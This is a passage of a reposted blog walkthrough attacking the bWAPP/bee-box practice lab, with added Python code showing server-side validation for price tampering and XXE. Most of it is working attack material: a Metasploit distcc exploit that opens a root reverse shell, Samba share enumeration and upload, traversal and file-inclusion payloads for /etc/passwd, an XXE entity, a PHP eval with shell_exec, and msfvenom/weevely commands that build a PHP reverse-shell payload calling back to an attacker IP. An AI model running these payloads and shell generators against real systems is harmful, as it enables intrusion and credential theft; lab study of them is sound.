#Many bugs come from prices not being obfuscated; even when they are, you can still test by submitting decimals
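The ticket order above trusts a hidden ticket_price field and a client-controlled quantity, which is why editing the field or sending a decimal works. The Python below is an added example of the server-side handling, not bWAPP's code: the price comes from a server-side catalogue (TICKET_PRICES, a constructed stand-in), any price submitted by the client is never read, and the quantity must be a positive whole number, so decimals, negatives, zero and exponent forms are rejected. parse_quantity, place_order and OrderError are names chosen for this example.

```python
from decimal import Decimal

# Server-side catalogue: the only source of truth for prices (constructed).
TICKET_PRICES = {"movie": Decimal("15.00")}
MAX_QUANTITY = 100


class OrderError(ValueError):
    """Raised when the submitted order fails validation."""


def parse_quantity(raw):
    """Accept a positive whole number only.

    str.isdigit() rejects signs, decimal points and exponents; the isascii()
    guard keeps Unicode digit forms (which int() would not accept) out; the
    range check stops absurd orders."""
    if not (raw.isascii() and raw.isdigit()):
        raise OrderError(f"invalid quantity {raw!r}")
    qty = int(raw)
    if qty < 1 or qty > MAX_QUANTITY:
        raise OrderError("quantity out of range")
    return qty


def place_order(form):
    """Compute the total from the catalogue.

    A client-supplied ticket_price (the hidden field on the page) is simply
    never consulted, so tampering with it has no effect on the total."""
    product = form.get("product", "movie")
    if product not in TICKET_PRICES:
        raise OrderError("unknown product")
    qty = parse_quantity(form.get("ticket_quantity", ""))
    return {"product": product, "quantity": qty,
            "total": TICKET_PRICES[product] * qty}


if __name__ == "__main__":
    print(place_order({"ticket_quantity": "2", "ticket_price": "0.01"}))
    for bad in ("1.5", "-1", "0", "1e3"):
        try:
            place_order({"ticket_quantity": bad})
        except OrderError as exc:
            print(f"{bad!r}: {exc}")
```

Decimal is used for money so that 15.00 * 3 is exactly 45.00; with floats, rounding artefacts would eventually leak into totals and receipts.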

0x006. A5 – Security Misconfiguration

1.Arbitrary File Access (Samba)

msf exploit(unix/misc/distcc_exec) > set rhost 192.168.1.104
rhost => 192.168.1.104
msf exploit(unix/misc/distcc_exec) > exploit 
[*] Started reverse TCP double handler on 192.168.1.101:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vbyqH8dKW4KUZQNS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vbyqH8dKW4KUZQNS\r\n"
[*] Matching...
[*] B is input...
id
uid=0(root) gid=0(root) groups=0(root)

Enumerate with enum4linux

#detailed usage: https://labs.portcullis.co.uk/tools/enum4linux/
enum4linux -S 192.168.1.104 #you can also just append the IP for more detailed information gathering
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec  7 17:43:26 2018
========================== 
|    Target Information    |
========================== 
Target ........... 192.168.1.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.104    |
===================================================== 
[+] Got domain/workgroup name: ITSECGAMES
====================================== 
|    Session Check on 192.168.1.104    |
====================================== 
[+] Server 192.168.1.104 allows sessions using username '', password ''
============================================ 
|    Getting domain SID for 192.168.1.104    |
============================================ 
Domain Name: ITSECGAMES
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================== 
|    Share Enumeration on 192.168.1.104    |
========================================== 
Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
opt             Disk      
tmp             Disk      oh noes!
print$          Disk      Printer Drivers
Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
Snagit_9:6      Printer   Snagit 9
Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
PDF             Printer   PDF
Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
Fax:2           Printer   Fax
CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Server               Comment
---------            -------
Workgroup            Master
---------            -------
ITSECGAMES           BEE-BOX
WORKGROUP            FREE
[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$	[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/opt	Mapping: DENIED, Listing: N/A
//192.168.1.104/tmp	Mapping: OK, Listing: OK
//192.168.1.104/print$	Mapping: DENIED, Listing: N/A
//192.168.1.104/Xerox_Phaser_8500DN_PS:7	Mapping: DENIED, Listing: N/A
//192.168.1.104/Snagit_9:6	Mapping: DENIED, Listing: N/A
//192.168.1.104/Send_To_OneNote_2010:8	Mapping: DENIED, Listing: N/A
//192.168.1.104/PDF	Mapping: DENIED, Listing: N/A
//192.168.1.104/Microsoft_XPS_Document_Writer:1	Mapping: DENIED, Listing: N/A
//192.168.1.104/HP_Officejet_6500_E710a-f_(Network):5	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax_-_HP_Officejet_6500_E710a-f_(Network):4	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax:2	Mapping: DENIED, Listing: N/A
//192.168.1.104/CutePDF_Writer:3	Mapping: DENIED, Listing: N/A
enum4linux complete on Fri Dec  7 17:43:27 2018

smbclient -L 192.168.1.104

Enter WORKGROUP\root's password: 
Anonymous login successful
Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
opt             Disk      
tmp             Disk      oh noes!
print$          Disk      Printer Drivers
Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
Snagit_9:6      Printer   Snagit 9
Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
PDF             Printer   PDF
Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
Fax:2           Printer   Fax
CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server               Comment
---------            -------
Workgroup            Master
---------            -------
ITSECGAMES           BEE-BOX

Upload a file

smbclient \\\\192.168.1.104\\tmp -c "put test"

0x007

1.HTML5 Web Storage (Secret)

if(typeof(Storage) !== "undefined")
{
localStorage.login = "bee";
localStorage.secret = "1";
alert(localStorage.login);
alert(localStorage.secret);
}

2.Directory Traversal – Directories

?directory=../../../../var/www/

3.Directory Traversal – Files

?page=../../../../../etc/passwd

4.Host Header Attack (Cache Poisoning)

GET /bWAPP/hostheader_1.php HTTP/1.1
Host: www.baidu.com

5.Remote & Local File Inclusion (RFI/LFI)

?language=../../../../etc/passwd&action=go
?language=http://www.baidu.com

6.Restrict Device Access

Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMacOSX;en-us)AppleWebKit/532.9(KHTML,likeGecko) Version/4.0.5Mobile/8A293Safari/6531.22.7

7.XML External Entity Attacks (XXE)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY popped SYSTEM "file:///etc/passwd">
]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>
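The reset document in A4 section 2 and the XXE document here are the same request seen from two angles: the XML names the account (an IDOR if the server trusts it) and, once a DTD is allowed, an external entity. The Python below is an added example, not bWAPP code: parse_reset_request refuses any DOCTYPE or ENTITY declaration before the XML parser runs, checks the root element and required fields, and requires the login in the document to match the session's login (session_login is an assumed parameter supplied by the session layer). Both inputs are constructed copies of the documents shown on the page.

```python
import re
import xml.etree.ElementTree as ET

# Constructed inputs: the page's reset document and its XXE variant.
BENIGN_RESET = b"<reset><login>bee</login><secret>Any bugs?</secret></reset>"
XXE_RESET = (b'<?xml version="1.0" encoding="utf-8"?>'
             b'<!DOCTYPE root [<!ENTITY popped SYSTEM "file:///etc/passwd">]>'
             b'<reset><login>&popped;</login><secret>Any bugs?</secret></reset>')

# Any DTD is refused outright; this application has no legitimate use for one.
DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised for documents that fail the policy checks below."""


def parse_reset_request(raw, session_login):
    """Parse a <reset> document safely and bind it to the logged-in user.

    - Reject DOCTYPE/ENTITY before the parser sees the bytes, which removes
      the external-entity vector (a policy choice, not an ElementTree feature).
    - Require the expected root element and both child fields.
    - Accept the login the client asserts only if it matches the session, so
      the request cannot reset another account's secret (the IDOR).
    session_login is an assumed parameter from the session layer."""
    if DTD_RE.search(raw):
        raise UnsafeXML("DTD / entity declarations are not accepted")
    root = ET.fromstring(raw)
    if root.tag != "reset":
        raise UnsafeXML(f"unexpected root element {root.tag!r}")
    login = root.findtext("login")
    secret = root.findtext("secret")
    if not login or secret is None:
        raise UnsafeXML("login and secret are required")
    if login != session_login:
        raise UnsafeXML("login does not match the authenticated session")
    return {"login": login, "secret": secret}


if __name__ == "__main__":
    print(parse_reset_request(BENIGN_RESET, "bee"))
    for raw, who in ((XXE_RESET, "bee"), (BENIGN_RESET, "alice")):
        try:
            parse_reset_request(raw, who)
        except UnsafeXML as exc:
            print("rejected:", exc)
```

The byte-level pre-check is deliberately blunt: it refuses a document that merely mentions a DTD. In production it belongs beside a parser configured to forbid DTDs and entity expansion (for example defusedxml), since a pre-check alone can be confused by an unexpected document encoding.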

8.CSRF (Change Password)

?password_new=123&password_conf=123&action=change

9.PHP Eval Function

php_eval.php?eval=echo shell_exec("cat /etc/passwd");

10.Unrestricted File Upload

#low
weevely generate 123456 shell.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e php/base64 -f raw > shelltmp.php
#high 
Remote & Local File Inclusion (RFI/LFI) 
rlfi.php?language=images/shelltmp.php.png

Summary:

Only black-box testing was done against this target; the source code was not analysed. I haven't studied PHP much and am still rather lazy about it. Kali Linux tools were used for the penetration test; tool scans produce false positives and miss many vulnerabilities. Tools are only an aid: manual re-confirmation is still needed, and the underlying principles need further study and practice.

Publisher: 全栈程序员栈长; when reposting, please cite the source: https://javaforall.cn/190140.html (original link: https://javaforall.cn)
Originally published 24 September 2022.